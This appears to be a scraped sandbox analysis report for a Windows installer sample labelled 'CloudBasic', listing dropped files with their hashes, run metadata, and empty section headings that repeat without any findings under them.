C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C}	Composite Document File V2 Document, Cannot read section info	0EFB9903EE9EC6E7D0E8AB72D1864671	2D0356BFB5899930D543E67277A415BEC3ADEE5D	B8DA41E5AEB98541D137E3B9714B7B8DEE49E11783447282006C7D77B2D14EA1
C:\Windows\Installer\inprogressinstallinfo.ipi	Composite Document File V2 Document, Cannot read section info	32C8D59126278BDA8C1C4FAEF83DA2D3	13C3818E8694332CC28D45031E4C575F3B5589B8	1D293703202F1B765BB9BFD9BC11AB4E424525FB0EEBDA6F7DA237426F640F45
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	C9985B61FD6F4A507731DF00B4F8E04A	54CAD06C32308CD297553DB7F1E85B86CAE75FE7	559F5609D0720EB84C04E0BDCA13C4B0B2C0C2727026C77DB956C03A9CE05AF9
C:\Windows\Temp\~DF63A39A71889A1441.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF955C0F74E76F5F0B.TMP	Composite Document File V2 Document, Cannot read section info	F23DAB9FE40E6F5BF36605895C8A9C2E	E609497B9333AB0A2949BF066A49AFFC3DE1E9B9	7BF9E37239A01880D6A79473A908FD9503FE5B239BAC67EDBD3853C8F69A32A8
C:\Windows\Temp\~DFCBDD387D69BE3BAD.TMP	data	82574E966C1F79BBF070F925E84EEF6E	BCE3E0995D175FF675CB228E6BDE38F8EAEB5D41	A12457B566AE189D738DB217C94F971F36DDFB65A680CA9D55B2745532D902A6
C:\Windows\Temp\~DFD6608F7D06E5D7CD.TMP	data	0290F0C81075AFDA9F4814F84378D2F3	68189B2C6D66C5EA1DC6C6438DC293470537BE58	0C0CAB1F30F3B84447AD13FDA6BAE0820917317AE8FD10FFD03718AD6D023C44
\Device\Null	ASCII text, with CRLF line terminators	2E512EE24AAB186D09E9A1F9B72A0569	C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B	DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F

ID:	1417308
Product:	CloudBasic
Start time:	22:44:20
Start date:	28.03.2024
Sample:	JWQgbclQK5
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	41bf2693033eaed432dfa5c1d75cdeec
SHA1:	ff038cb9e992a518106c80868176785e987c301d
SHA256:	148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
JWQgbclQK5

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report JWQgbclQK5

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report
JWQgbclQK5